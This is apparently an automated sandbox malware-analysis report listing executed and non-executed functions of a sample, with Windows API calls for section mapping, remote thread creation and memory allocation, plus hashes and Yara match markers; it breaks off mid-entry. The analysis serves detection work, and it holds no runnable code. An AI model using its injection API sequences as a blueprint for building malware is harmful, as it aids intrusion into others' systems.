nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0277FE01 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0277FE29
Module32First.KERNEL32(00000000,00000224), ref: 0277FE49

Memory Dump Source

Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8afb95ebc9d1f8fedaad84b5f9c10160769ca9b0bb3aa8e48ab6aca32493bd7d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B6F096312007156BDB203BF9AD8DB7F76ECAF49624F10052DF646D18C1DBB4E8454A62

Function 025B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025B024D

Strings

cess, xrefs: 025B018D
kernel32.dll, xrefs: 025B008F, 025B0095

Memory Dump Source

Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4b78ccde5262370ef2ce6d89914bcf3178e9d6056a566947f6f95aa948e59ef1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 62526974A01229DFDB65CF68C984BADBBB1BF09314F1480D9E54DAB391DB30AA85CF14

Function 025B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025B0223,?,?), ref: 025B0E19
SetErrorMode.KERNELBASE(00000000,?,?,025B0223,?,?), ref: 025B0E1E

Memory Dump Source

Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 8f6d2e30e3af7fa99cae600574b5a2077abbbd3ebbb0e80a8fe1475a88e7ad37
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 55D0123514512877D7012A94DC09BCE7F1CDF05B66F008011FB0DD9080C770954046E9

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 0277FAC0 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0277FB11

Memory Dump Source

Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: eb5eb0a3c1011b99183c73d566656f92702fa601819c8ce16ef052d079ef7e9c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D0113C79A00208EFDB01DF98CA89E99BBF5AF08351F058095F9489B361D371EA50DF81

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Non-executed Functions

Function 025B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 025B095F
GetProcAddress., xrefs: 025B09DC, 025B09DF, 025B09E4
l, xrefs: 025B0966

Memory Dump Source

Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3c9d65a91fee16ed02694a8d60e72c2847b7cda024a17a1603b416109df84c65
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 283138B6900609DFDB11CF99C880AEEBBF9FF48324F15414AD841A7290D771EA45CBA8

Function 0277F6DE Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 1a47790a306805ba049ca9d3af912b3f16e3031a1333a2303d1341d45541a37e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: AD118B72340101AFDB44DF59DDC1FA673EAFB89320B298065ED08CB712E675E802CBA0

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 025B0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 2d40024afa07c794fc5629f41694a1e46b6c52cf537376d1589a8fc6387ccb3a
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: DA01A276A106048FDF22DF24C805BEB33E5FF86216F4545A5D90A972C1E774A9418B98

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Analysis Process: haevsidPID: 5064, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	0%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 025B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025B024D

Strings

kernel32.dll, xrefs: 025B008F, 025B0095
cess, xrefs: 025B018D

Memory Dump Source

Source File: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25b0000_haevsid.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4b78ccde5262370ef2ce6d89914bcf3178e9d6056a566947f6f95aa948e59ef1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 62526974A01229DFDB65CF68C984BADBBB1BF09314F1480D9E54DAB391DB30AA85CF14

Function 0274F239 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

